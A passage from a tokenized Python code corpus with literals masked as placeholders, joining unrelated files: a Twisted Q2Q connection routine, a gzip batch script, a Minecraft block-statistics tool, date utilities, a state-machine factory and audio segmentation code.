resource == '<STR_LIT>' , "<STR_LIT>" % ( fromAddress , ) <EOL> authorize = False <EOL> ourCert = KeyPair . generate ( ) . selfSignedCert ( <NUM_LIT> , CN = '<STR_LIT:@>' ) <EOL> cacheFrom = fromAddress <EOL> log . msg ( "<STR_LIT>" ) <EOL> else : <EOL> try : <EOL> x = fromAddress . domainAddress ( ) <EOL> ourCert = GPS ( str ( x ) ) <EOL> cacheFrom = x <EOL> log . msg ( '<STR_LIT>' , fromAddress , ourCert , cacheFrom ) <EOL> except KeyError : <EOL> try : <EOL> x = fromAddress <EOL> ourCert = GPS ( str ( x ) ) <EOL> cacheFrom = x <EOL> log . msg ( '<STR_LIT>' , fromAddress , ourCert , cacheFrom ) <EOL> except KeyError : <EOL> try : <EOL> x = toDomain <EOL> ourCert = GPS ( str ( x ) ) <EOL> cacheFrom = x <EOL> log . msg ( '<STR_LIT>' , fromAddress , ourCert , cacheFrom ) <EOL> except KeyError : <EOL> raise VerifyError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( fromAddress , <EOL> toAddress ) ) <EOL> def connected ( proto ) : <EOL> certD = self . certificateStorage . getSelfSignedCertificate ( <EOL> str ( toDomain ) ) <EOL> def nocert ( failure ) : <EOL> failure . trap ( KeyError ) <EOL> identD = proto . callRemote ( Identify , subject = toDomain ) . addCallback ( <EOL> lambda x : x [ '<STR_LIT>' ] ) <EOL> def storeit ( certificate ) : <EOL> return self . certificateStorage . storeSelfSignedCertificate ( <EOL> str ( toDomain ) , certificate <EOL> ) . addCallback ( lambda x : certificate ) <EOL> return identD . addCallback ( storeit ) <EOL> certD . addErrback ( nocert ) <EOL> def gotcert ( foreignCA ) : <EOL> secdef = proto . secure ( cacheFrom , toDomain , <EOL> ourCert , foreignCA , <EOL> authorize = authorize ) <EOL> return secdef <EOL> certD . addCallback ( gotcert ) <EOL> return certD <EOL> return self . secureConnectionCache . connectCached ( <EOL> endpoint . 
TCPEndpoint ( toIPAddress , port ) , <EOL> Q2QClientFactory ( self ) , <EOL> extraWork = connected , <EOL> extraHash = ( cacheFrom , toDomain , authorize ) <EOL> ) <EOL> return resolveme . addCallback ( cb ) </s>
<s> import os <EOL> from os import walk <EOL> import sys <EOL> import thread <EOL> import gzip <EOL> from multiprocessing import Pool , Process , Queue <EOL> PROCESS_COUNT = <NUM_LIT:8> <EOL> class Utils : <EOL> @ staticmethod <EOL> def rename ( file , to ) : <EOL> call_rename = "<STR_LIT>" % ( file , to ) <EOL> print call_rename <EOL> os . system ( call_rename ) <EOL> return to <EOL> @ staticmethod <EOL> def archive ( file ) : <EOL> if "<STR_LIT>" in file : <EOL> return file <EOL> file_archive = "<STR_LIT>" % file <EOL> Utils . rename ( file , file_archive ) <EOL> return file_archive <EOL> @ staticmethod <EOL> def unarchive ( file ) : <EOL> if "<STR_LIT>" not in file : <EOL> return file <EOL> file2 = file [ : - <NUM_LIT:8> ] <EOL> Utils . rename ( file , file2 ) <EOL> return file2 <EOL> @ staticmethod <EOL> def gzip ( file ) : <EOL> if "<STR_LIT>" in file : <EOL> return file <EOL> call_zip = "<STR_LIT>" % ( file ) <EOL> print call_zip <EOL> os . system ( call_zip ) <EOL> return "<STR_LIT>" % file <EOL> @ staticmethod <EOL> def gunzip ( file ) : <EOL> if "<STR_LIT>" not in file : <EOL> return file <EOL> call_unzip = "<STR_LIT>" % ( file ) <EOL> print call_unzip <EOL> os . system ( call_unzip ) <EOL> return file [ : - <NUM_LIT:3> ] <EOL> @ staticmethod <EOL> def cat_all ( path , file ) : <EOL> call_cat = "<STR_LIT>" % ( path , file ) <EOL> print call_cat <EOL> os . system ( call_cat ) <EOL> @ staticmethod <EOL> def get_files ( path ) : <EOL> files = [ ] <EOL> for ( dirpath , dirnames , filenames ) in walk ( path ) : <EOL> for f in filenames : <EOL> file = "<STR_LIT>" % ( dirpath , f ) <EOL> files . append ( file ) <EOL> return files <EOL> def reset_file ( file , table , output = None ) : <EOL> if "<STR_LIT>" in file : <EOL> file = Utils . unarchive ( file ) <EOL> if file . endswith ( "<STR_LIT>" ) : <EOL> file = Utils . gzip ( file ) <EOL> if output : <EOL> output . put ( file ) <EOL> return file <EOL> def process_files ( path , table ) : <EOL> files = Utils . 
get_files ( path ) <EOL> for f in files : <EOL> if "<STR_LIT>" in f : <EOL> file = Utils . gunzip ( f ) <EOL> files = Utils . get_files ( path ) <EOL> file_result = "<STR_LIT>" <EOL> Utils . cat_all ( path , file_result ) <EOL> file_gz = Utils . gzip ( file_result ) <EOL> call_batch = "<STR_LIT>" % ( table , file_result ) <EOL> print call_batch <EOL> os . system ( call_batch ) <EOL> return file_result <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if len ( sys . argv ) != <NUM_LIT:4> : <EOL> print "<STR_LIT>" <EOL> ( script , action , path , table ) = sys . argv <EOL> files = [ ] <EOL> processes = [ ] <EOL> function = None <EOL> if action == '<STR_LIT>' : <EOL> if os . path . isfile ( path ) : <EOL> files . append ( path ) <EOL> else : <EOL> files = Utils . get_files ( path ) <EOL> pool = Pool ( processes = PROCESS_COUNT ) <EOL> results = [ pool . apply_async ( reset_file , args = ( f , table ) ) for f in files ] <EOL> output = [ p . get ( ) for p in results ] <EOL> print output <EOL> elif action == '<STR_LIT>' : <EOL> process_files ( path , table ) </s>
<s> """<STR_LIT>""" <EOL> import locale , os , sys <EOL> import glob <EOL> try : <EOL> import nbt <EOL> except ImportError : <EOL> extrasearchpath = os . path . realpath ( os . path . join ( __file__ , os . pardir , os . pardir ) ) <EOL> if not os . path . exists ( os . path . join ( extrasearchpath , '<STR_LIT>' ) ) : <EOL> raise <EOL> sys . path . append ( extrasearchpath ) <EOL> from nbt . region import RegionFile <EOL> from nbt . chunk import McRegionChunk <EOL> def stats_per_chunk ( chunk , block_data_totals ) : <EOL> """<STR_LIT>""" <EOL> for block_id , data_id in chunk . blocks . get_all_blocks_and_data ( ) : <EOL> block_data_totals [ block_id ] [ data_id ] += <NUM_LIT:1> <EOL> def bounded_stats_per_chunk ( chunk , block_data_totals , start , stop ) : <EOL> """<STR_LIT>""" <EOL> chunk_z , chunk_x = chunk . get_coords ( ) <EOL> for z in range ( <NUM_LIT:16> ) : <EOL> world_z = z + chunk_z * <NUM_LIT:16> <EOL> if ( ( start != None and world_z < int ( start [ <NUM_LIT:2> ] ) ) or ( stop != None and world_z > int ( stop [ <NUM_LIT:2> ] ) ) ) : <EOL> break <EOL> for x in range ( <NUM_LIT:16> ) : <EOL> world_x = x + chunk_x * <NUM_LIT:16> <EOL> if ( ( start != None and world_x < int ( start [ <NUM_LIT:0> ] ) ) or ( stop != None and world_x > int ( stop [ <NUM_LIT:0> ] ) ) ) : <EOL> break <EOL> for y in range ( <NUM_LIT> ) : <EOL> if ( ( start != None and y < int ( start [ <NUM_LIT:1> ] ) ) or ( stop != None and y > int ( stop [ <NUM_LIT:1> ] ) ) ) : <EOL> break <EOL> block_id , block_data = chunk . blocks . get_block_and_data ( x , y , z ) <EOL> block_data_totals [ block_id ] [ block_data ] += <NUM_LIT:1> <EOL> def process_region_file ( filename , start , stop ) : <EOL> """<STR_LIT>""" <EOL> pieces = filename . 
split ( '<STR_LIT:.>' ) <EOL> rx = int ( pieces [ - <NUM_LIT:3> ] ) <EOL> rz = int ( pieces [ - <NUM_LIT:2> ] ) <EOL> block_data_totals = [ [ <NUM_LIT:0> ] * <NUM_LIT:16> for i in range ( <NUM_LIT> ) ] <EOL> if ( start != None ) : <EOL> if ( ( rx + <NUM_LIT:1> ) * <NUM_LIT> - <NUM_LIT:1> < int ( start [ <NUM_LIT:0> ] ) or ( rz + <NUM_LIT:1> ) * <NUM_LIT> - <NUM_LIT:1> < int ( start [ <NUM_LIT:2> ] ) ) : <EOL> return block_data_totals <EOL> elif ( stop != None ) : <EOL> if ( rx * <NUM_LIT> - <NUM_LIT:1> > int ( stop [ <NUM_LIT:0> ] ) or rz * <NUM_LIT> - <NUM_LIT:1> > int ( stop [ <NUM_LIT:2> ] ) ) : <EOL> return block_data_totals <EOL> file = RegionFile ( filename ) <EOL> chunks = file . get_chunks ( ) <EOL> print ( "<STR_LIT>" % ( os . path . basename ( filename ) , len ( chunks ) ) ) <EOL> for c in chunks : <EOL> if ( start != None ) : <EOL> if ( ( c [ '<STR_LIT:x>' ] + <NUM_LIT:1> ) * <NUM_LIT:16> + rx * <NUM_LIT> - <NUM_LIT:1> < int ( start [ <NUM_LIT:0> ] ) or ( c [ '<STR_LIT:z>' ] + <NUM_LIT:1> ) * <NUM_LIT:16> + rz * <NUM_LIT> - <NUM_LIT:1> < int ( start [ <NUM_LIT:2> ] ) ) : <EOL> continue <EOL> elif ( stop != None ) : <EOL> if ( c [ '<STR_LIT:x>' ] * <NUM_LIT:16> + rx * <NUM_LIT> - <NUM_LIT:1> > int ( stop [ <NUM_LIT:0> ] ) or c [ '<STR_LIT:z>' ] * <NUM_LIT:16> + rz * <NUM_LIT> - <NUM_LIT:1> > int ( stop [ <NUM_LIT:2> ] ) ) : <EOL> continue <EOL> chunk = McRegionChunk ( file . get_chunk ( c [ '<STR_LIT:x>' ] , c [ '<STR_LIT:z>' ] ) ) <EOL> assert chunk . get_coords ( ) == ( c [ '<STR_LIT:x>' ] + rx * <NUM_LIT:32> , c [ '<STR_LIT:z>' ] + rz * <NUM_LIT:32> ) <EOL> if ( start == None and stop == None ) : <EOL> stats_per_chunk ( chunk , block_data_totals ) <EOL> else : <EOL> bounded_stats_per_chunk ( chunk , block_data_totals , start , stop ) <EOL> return block_data_totals <EOL> def print_results ( block_data_totals ) : <EOL> locale . setlocale ( locale . 
LC_ALL , '<STR_LIT>' ) <EOL> for block_id , data in enumerate ( block_data_totals ) : <EOL> if sum ( data ) > <NUM_LIT:0> : <EOL> datastr = "<STR_LIT:U+002CU+0020>" . join ( [ locale . format_string ( "<STR_LIT>" , ( i , c ) , grouping = True ) for ( i , c ) in enumerate ( data ) if c > <NUM_LIT:0> ] ) <EOL> print ( locale . format_string ( "<STR_LIT>" , ( block_id , sum ( data ) , datastr ) , grouping = True ) ) <EOL> block_totals = [ sum ( data_totals ) for data_totals in block_data_totals ] <EOL> total_blocks = sum ( block_totals ) <EOL> solid_blocks = total_blocks - block_totals [ <NUM_LIT:0> ] <EOL> solid_ratio = ( solid_blocks + <NUM_LIT:0.0> ) / total_blocks if ( total_blocks > <NUM_LIT:0> ) else <NUM_LIT:0> <EOL> print ( locale . format_string ( "<STR_LIT>" , ( total_blocks , solid_blocks , <NUM_LIT> * solid_ratio ) , grouping = True ) + "<STR_LIT>" ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT:15> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT:16> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . 
format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT> ] , grouping = True ) ) <EOL> print ( locale . format_string ( "<STR_LIT>" , block_totals [ <NUM_LIT:11> ] , grouping = True ) ) <EOL> def main ( world_folder , start = None , stop = None ) : <EOL> if ( not os . path . exists ( world_folder ) ) : <EOL> print ( "<STR_LIT>" + world_folder ) <EOL> return <NUM_LIT:2> <EOL> regions = glob . glob ( os . path . join ( world_folder , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> block_data_totals = [ [ <NUM_LIT:0> ] * <NUM_LIT:16> for i in range ( <NUM_LIT> ) ] <EOL> try : <EOL> for filename in regions : <EOL> region_totals = process_region_file ( filename , start , stop ) <EOL> for i , data in enumerate ( region_totals ) : <EOL> for j , total in enumerate ( data ) : <EOL> block_data_totals [ i ] [ j ] += total <EOL> except KeyboardInterrupt : <EOL> print_results ( block_data_totals ) <EOL> return <NUM_LIT> <EOL> print_results ( block_data_totals ) <EOL> return <NUM_LIT:0> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if ( len ( sys . argv ) == <NUM_LIT:1> ) : <EOL> print ( "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] ) <EOL> sys . exit ( <NUM_LIT:64> ) <EOL> world_folder = sys . argv [ <NUM_LIT:1> ] <EOL> world_folder = os . path . normpath ( world_folder ) <EOL> if ( not os . path . exists ( world_folder ) ) : <EOL> print ( "<STR_LIT>" + world_folder ) <EOL> sys . exit ( <NUM_LIT> ) <EOL> start , stop = None , None <EOL> if ( len ( sys . argv ) == <NUM_LIT:4> ) : <EOL> start_str = sys . argv [ <NUM_LIT:2> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> start = tuple ( start_str . 
split ( '<STR_LIT:U+002C>' ) ) <EOL> stop_str = sys . argv [ <NUM_LIT:3> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> stop = tuple ( stop_str . split ( '<STR_LIT:U+002C>' ) ) <EOL> sys . exit ( main ( world_folder , start , stop ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import datetime <EOL> import re <EOL> import pytz <EOL> from pytz import UTC <EOL> from . util import if_none <EOL> def ensure_date ( date ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( date , datetime . datetime ) : <EOL> if date . tzinfo is None : <EOL> raise TypeError ( <EOL> "<STR_LIT>" ) <EOL> else : <EOL> return date . date ( ) <EOL> if isinstance ( date , datetime . date ) : <EOL> return date <EOL> if isinstance ( date , int ) and <NUM_LIT> <= date <= <NUM_LIT> : <EOL> return datetime . date ( date // <NUM_LIT> , ( date % <NUM_LIT> ) // <NUM_LIT:100> , date % <NUM_LIT:100> ) <EOL> if date == "<STR_LIT>" : <EOL> return datetime . date . today ( ) <EOL> if date == "<STR_LIT>" : <EOL> return datetime . datetime . utcnow ( ) . date ( ) <EOL> def from_ymd ( y , m , d ) : <EOL> try : <EOL> return datetime . date ( y , m , d ) <EOL> except ValueError : <EOL> raise TypeError ( "<STR_LIT>" . format ( date ) ) <EOL> if isinstance ( date , str ) : <EOL> match = re . match ( r"<STR_LIT>" , date ) <EOL> if match is None : <EOL> match = re . match ( r"<STR_LIT>" , date ) <EOL> if match is not None : <EOL> return from_ymd ( * [ int ( g ) for g in match . groups ( ) ] ) <EOL> raise TypeError ( "<STR_LIT>" . format ( date ) ) <EOL> def ensure_time ( time ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( time , datetime . datetime ) : <EOL> return date . time ( ) <EOL> if isinstance ( time , datetime . time ) : <EOL> return time <EOL> if time == "<STR_LIT>" : <EOL> return datetime . datetime . now ( ) . time ( ) <EOL> if time == "<STR_LIT>" : <EOL> return datetime . datetime . utcnow ( ) . time ( ) <EOL> def from_parts ( h , m , s = <NUM_LIT:0> ) : <EOL> try : <EOL> return datetime . time ( h , m , s ) <EOL> except ValueError : <EOL> raise TypeError ( "<STR_LIT>" . format ( time ) ) <EOL> if isinstance ( time , str ) : <EOL> match = re . 
match ( r"<STR_LIT>" , time ) <EOL> if match is None : <EOL> match = re . match ( r"<STR_LIT>" , time ) <EOL> if match is not None : <EOL> return from_parts ( * [ int ( g ) for g in match . groups ( ) ] ) <EOL> raise TypeError ( "<STR_LIT>" . format ( time ) ) <EOL> _DATETIME_REGEXES = [ <EOL> re . compile ( r ) <EOL> for r in ( <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> ) <EOL> ] <EOL> def ensure_datetime ( dt ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( dt , datetime . datetime ) : <EOL> return dt <EOL> try : <EOL> item = dt . item ( ) <EOL> except : <EOL> pass <EOL> else : <EOL> if isinstance ( item , datetime . datetime ) : <EOL> return item . replace ( tzinfo = UTC ) <EOL> if dt == "<STR_LIT>" : <EOL> return datetime . datetime . utcnow ( ) . replace ( tzinfo = UTC ) <EOL> def from_parts ( ye , mo , da , ho = <NUM_LIT:0> , mi = <NUM_LIT:0> , se = <NUM_LIT:0> ) : <EOL> try : <EOL> return datetime . datetime ( ye , mo , da , ho , mi , se , tzinfo = UTC ) <EOL> except ValueError : <EOL> raise TypeError ( "<STR_LIT>" . format ( dt ) ) <EOL> if isinstance ( dt , str ) : <EOL> for regex in _DATETIME_REGEXES : <EOL> match = regex . match ( dt ) <EOL> if match is not None : <EOL> ye = int ( match . group ( "<STR_LIT>" ) ) <EOL> mo = int ( match . group ( "<STR_LIT>" ) ) <EOL> da = int ( match . group ( "<STR_LIT>" ) ) <EOL> ho = int ( if_none ( match . group ( "<STR_LIT>" ) , <NUM_LIT:0> ) ) <EOL> mi = int ( if_none ( match . group ( "<STR_LIT>" ) , <NUM_LIT:0> ) ) <EOL> se = int ( if_none ( match . group ( "<STR_LIT>" ) , <NUM_LIT:0> ) ) <EOL> return from_parts ( ye , mo , da , ho , mi , se ) <EOL> raise TypeError ( "<STR_LIT>" . format ( dt ) ) <EOL> def ensure_timedelta ( delta ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( delta , datetime . timedelta ) : <EOL> return delta <EOL> if isinstance ( delta , str ) : <EOL> match = re . match ( r"<STR_LIT>" , delta ) <EOL> if match is not None : <EOL> num , unit = match . 
groups ( ) <EOL> if unit == "<STR_LIT:d>" : <EOL> return datetime . timedelta ( int ( num ) , <NUM_LIT:0> ) <EOL> else : <EOL> secs = int ( num ) * { "<STR_LIT:h>" : <NUM_LIT> , "<STR_LIT:m>" : <NUM_LIT> , "<STR_LIT:s>" : <NUM_LIT:1> } . get ( unit ) <EOL> return datetime . timedelta ( <NUM_LIT:0> , secs ) <EOL> raise TypeError ( "<STR_LIT>" . format ( delta ) ) <EOL> def ensure_tz ( tz ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( tz , datetime . tzinfo ) : <EOL> return tz <EOL> if tz is None : <EOL> return UTC <EOL> if isinstance ( tz , str ) : <EOL> try : <EOL> return pytz . timezone ( tz ) <EOL> except pytz . exceptions . UnknownTimeZoneError : <EOL> raise ValueError ( "<STR_LIT>" . format ( tz ) ) <EOL> raise TypeError ( "<STR_LIT>" . format ( tz ) ) </s>
<s> from . . core import Machine <EOL> from . nesting import HierarchicalMachine , NestedTransition , NestedEvent <EOL> from . locking import LockedMachine , LockedEvent <EOL> from . diagrams import GraphMachine , TransitionGraphSupport <EOL> class MachineFactory ( object ) : <EOL> @ staticmethod <EOL> def get_predefined ( graph = False , nested = False , locked = False ) : <EOL> if graph and nested and locked : <EOL> return LockedHierarchicalGraphMachine <EOL> elif locked and nested : <EOL> return LockedHierarchicalMachine <EOL> elif locked and graph : <EOL> return LockedGraphMachine <EOL> elif nested and graph : <EOL> return HierarchicalGraphMachine <EOL> elif graph : <EOL> return GraphMachine <EOL> elif nested : <EOL> return HierarchicalMachine <EOL> elif locked : <EOL> return LockedMachine <EOL> else : <EOL> return Machine <EOL> class NestedGraphTransition ( TransitionGraphSupport , NestedTransition ) : <EOL> pass <EOL> class LockedNestedEvent ( LockedEvent , NestedEvent ) : <EOL> pass <EOL> class HierarchicalGraphMachine ( GraphMachine , HierarchicalMachine ) : <EOL> @ staticmethod <EOL> def _create_transition ( * args , ** kwargs ) : <EOL> return NestedGraphTransition ( * args , ** kwargs ) <EOL> class LockedHierarchicalMachine ( LockedMachine , HierarchicalMachine ) : <EOL> @ staticmethod <EOL> def _create_event ( * args , ** kwargs ) : <EOL> return LockedNestedEvent ( * args , ** kwargs ) <EOL> class LockedGraphMachine ( GraphMachine , LockedMachine ) : <EOL> pass <EOL> class LockedHierarchicalGraphMachine ( GraphMachine , LockedMachine , HierarchicalMachine ) : <EOL> @ staticmethod <EOL> def _create_transition ( * args , ** kwargs ) : <EOL> return NestedGraphTransition ( * args , ** kwargs ) <EOL> @ staticmethod <EOL> def _create_event ( * args , ** kwargs ) : <EOL> return LockedNestedEvent ( * args , ** kwargs ) </s>
<s> import numpy <EOL> import mlpy <EOL> import time <EOL> import scipy <EOL> import os <EOL> import audioFeatureExtraction as aF <EOL> import audioTrainTest as aT <EOL> import audioBasicIO <EOL> import matplotlib . pyplot as plt <EOL> from scipy . spatial import distance <EOL> import matplotlib . pyplot as plt <EOL> import matplotlib . cm as cm <EOL> from sklearn . lda import LDA <EOL> import csv <EOL> import os . path <EOL> import sklearn <EOL> import sklearn . hmm <EOL> import cPickle <EOL> import glob <EOL> """<STR_LIT>""" <EOL> def smoothMovingAvg ( inputSignal , windowLen = <NUM_LIT:11> ) : <EOL> windowLen = int ( windowLen ) <EOL> if inputSignal . ndim != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if inputSignal . size < windowLen : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if windowLen < <NUM_LIT:3> : <EOL> return inputSignal <EOL> s = numpy . r_ [ <NUM_LIT:2> * inputSignal [ <NUM_LIT:0> ] - inputSignal [ windowLen - <NUM_LIT:1> : : - <NUM_LIT:1> ] , inputSignal , <NUM_LIT:2> * inputSignal [ - <NUM_LIT:1> ] - inputSignal [ - <NUM_LIT:1> : - windowLen : - <NUM_LIT:1> ] ] <EOL> w = numpy . ones ( windowLen , '<STR_LIT:d>' ) <EOL> y = numpy . convolve ( w / w . sum ( ) , s , mode = '<STR_LIT>' ) <EOL> return y [ windowLen : - windowLen + <NUM_LIT:1> ] <EOL> def selfSimilarityMatrix ( featureVectors ) : <EOL> '''<STR_LIT>''' <EOL> [ nDims , nVectors ] = featureVectors . shape <EOL> [ featureVectors2 , MEAN , STD ] = aT . normalizeFeatures ( [ featureVectors . T ] ) <EOL> featureVectors2 = featureVectors2 [ <NUM_LIT:0> ] . T <EOL> S = <NUM_LIT:1.0> - distance . squareform ( distance . pdist ( featureVectors2 . 
T , '<STR_LIT>' ) ) <EOL> return S <EOL> def flags2segs ( Flags , window ) : <EOL> '''<STR_LIT>''' <EOL> preFlag = <NUM_LIT:0> <EOL> curFlag = <NUM_LIT:0> <EOL> numOfSegments = <NUM_LIT:0> <EOL> curVal = Flags [ curFlag ] <EOL> segsList = [ ] <EOL> classes = [ ] <EOL> while ( curFlag < len ( Flags ) - <NUM_LIT:1> ) : <EOL> stop = <NUM_LIT:0> <EOL> preFlag = curFlag <EOL> preVal = curVal <EOL> while ( stop == <NUM_LIT:0> ) : <EOL> curFlag = curFlag + <NUM_LIT:1> <EOL> tempVal = Flags [ curFlag ] <EOL> if ( ( tempVal != curVal ) | ( curFlag == len ( Flags ) - <NUM_LIT:1> ) ) : <EOL> numOfSegments = numOfSegments + <NUM_LIT:1> <EOL> stop = <NUM_LIT:1> <EOL> curSegment = curVal <EOL> curVal = Flags [ curFlag ] <EOL> segsList . append ( ( curFlag * window ) ) <EOL> classes . append ( preVal ) <EOL> segs = numpy . zeros ( ( len ( segsList ) , <NUM_LIT:2> ) ) <EOL> for i in range ( len ( segsList ) ) : <EOL> if i > <NUM_LIT:0> : <EOL> segs [ i , <NUM_LIT:0> ] = segsList [ i - <NUM_LIT:1> ] <EOL> segs [ i , <NUM_LIT:1> ] = segsList [ i ] <EOL> return ( segs , classes ) <EOL> def segs2flags ( segStart , segEnd , segLabel , winSize ) : <EOL> '''<STR_LIT>''' <EOL> flags = [ ] <EOL> classNames = list ( set ( segLabel ) ) <EOL> curPos = winSize / <NUM_LIT> <EOL> while curPos < segEnd [ - <NUM_LIT:1> ] : <EOL> for i in range ( len ( segStart ) ) : <EOL> if curPos > segStart [ i ] and curPos <= segEnd [ i ] : <EOL> break <EOL> flags . append ( classNames . index ( segLabel [ i ] ) ) <EOL> curPos += winSize <EOL> return numpy . array ( flags ) , classNames <EOL> def readSegmentGT ( gtFile ) : <EOL> '''<STR_LIT>''' <EOL> f = open ( gtFile , "<STR_LIT:rb>" ) <EOL> reader = csv . reader ( f , delimiter = '<STR_LIT:U+002C>' ) <EOL> segStart = [ ] <EOL> segEnd = [ ] <EOL> segLabel = [ ] <EOL> for row in reader : <EOL> if len ( row ) == <NUM_LIT:3> : <EOL> segStart . append ( float ( row [ <NUM_LIT:0> ] ) ) <EOL> segEnd . append ( float ( row [ <NUM_LIT:1> ] ) ) <EOL> segLabel . 
append ( ( row [ <NUM_LIT:2> ] ) ) <EOL> return numpy . array ( segStart ) , numpy . array ( segEnd ) , segLabel <EOL> def plotSegmentationResults ( flagsInd , flagsIndGT , classNames , mtStep , ONLY_EVALUATE = False ) : <EOL> '''<STR_LIT>''' <EOL> flags = [ classNames [ int ( f ) ] for f in flagsInd ] <EOL> ( segs , classes ) = flags2segs ( flags , mtStep ) <EOL> minLength = min ( flagsInd . shape [ <NUM_LIT:0> ] , flagsIndGT . shape [ <NUM_LIT:0> ] ) <EOL> if minLength > <NUM_LIT:0> : <EOL> accuracy = numpy . count_nonzero ( flagsInd [ <NUM_LIT:0> : minLength ] == flagsIndGT [ <NUM_LIT:0> : minLength ] ) / float ( minLength ) <EOL> else : <EOL> accuracy = - <NUM_LIT:1> <EOL> if not ONLY_EVALUATE : <EOL> Duration = segs [ - <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> SPercentages = numpy . zeros ( ( len ( classNames ) , <NUM_LIT:1> ) ) <EOL> Percentages = numpy . zeros ( ( len ( classNames ) , <NUM_LIT:1> ) ) <EOL> AvDurations = numpy . zeros ( ( len ( classNames ) , <NUM_LIT:1> ) ) <EOL> for iSeg in range ( segs . shape [ <NUM_LIT:0> ] ) : <EOL> SPercentages [ classNames . index ( classes [ iSeg ] ) ] += ( segs [ iSeg , <NUM_LIT:1> ] - segs [ iSeg , <NUM_LIT:0> ] ) <EOL> for i in range ( SPercentages . shape [ <NUM_LIT:0> ] ) : <EOL> Percentages [ i ] = <NUM_LIT> * SPercentages [ i ] / Duration <EOL> S = sum ( <NUM_LIT:1> for c in classes if c == classNames [ i ] ) <EOL> if S > <NUM_LIT:0> : <EOL> AvDurations [ i ] = SPercentages [ i ] / S <EOL> else : <EOL> AvDurations [ i ] = <NUM_LIT:0.0> <EOL> for i in range ( Percentages . shape [ <NUM_LIT:0> ] ) : <EOL> print classNames [ i ] , Percentages [ i ] , AvDurations [ i ] <EOL> font = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:size>' : <NUM_LIT:10> } <EOL> plt . rc ( '<STR_LIT>' , ** font ) <EOL> fig = plt . figure ( ) <EOL> ax1 = fig . add_subplot ( <NUM_LIT> ) <EOL> ax1 . set_yticks ( numpy . array ( range ( len ( classNames ) ) ) ) <EOL> ax1 . 
axis ( ( <NUM_LIT:0> , Duration , - <NUM_LIT:1> , len ( classNames ) ) ) <EOL> ax1 . set_yticklabels ( classNames ) <EOL> ax1 . plot ( numpy . array ( range ( len ( flagsInd ) ) ) * mtStep + mtStep / <NUM_LIT> , flagsInd ) <EOL> if flagsIndGT . shape [ <NUM_LIT:0> ] > <NUM_LIT:0> : <EOL> ax1 . plot ( numpy . array ( range ( len ( flagsIndGT ) ) ) * mtStep + mtStep / <NUM_LIT> , flagsIndGT + <NUM_LIT> , '<STR_LIT>' ) <EOL> plt . xlabel ( "<STR_LIT>" ) <EOL> if accuracy >= <NUM_LIT:0> : <EOL> plt . title ( '<STR_LIT>' . format ( <NUM_LIT> * accuracy ) ) <EOL> ax2 = fig . add_subplot ( <NUM_LIT> ) <EOL> plt . title ( "<STR_LIT>" ) <EOL> ax2 . axis ( ( <NUM_LIT:0> , len ( classNames ) + <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:100> ) ) <EOL> ax2 . set_xticks ( numpy . array ( range ( len ( classNames ) + <NUM_LIT:1> ) ) ) <EOL> ax2 . set_xticklabels ( [ "<STR_LIT:U+0020>" ] + classNames ) <EOL> ax2 . bar ( numpy . array ( range ( len ( classNames ) ) ) + <NUM_LIT:0.5> , Percentages ) <EOL> ax3 = fig . add_subplot ( <NUM_LIT> ) <EOL> plt . title ( "<STR_LIT>" ) <EOL> ax3 . axis ( ( <NUM_LIT:0> , len ( classNames ) + <NUM_LIT:1> , <NUM_LIT:0> , AvDurations . max ( ) ) ) <EOL> ax3 . set_xticks ( numpy . array ( range ( len ( classNames ) + <NUM_LIT:1> ) ) ) <EOL> ax3 . set_xticklabels ( [ "<STR_LIT:U+0020>" ] + classNames ) <EOL> ax3 . bar ( numpy . array ( range ( len ( classNames ) ) ) + <NUM_LIT:0.5> , AvDurations ) <EOL> fig . tight_layout ( ) <EOL> plt . show ( ) <EOL> return accuracy <EOL> def evaluateSpeakerDiarization ( flags , flagsGT ) : <EOL> minLength = min ( flags . shape [ <NUM_LIT:0> ] , flagsGT . shape [ <NUM_LIT:0> ] ) <EOL> flags = flags 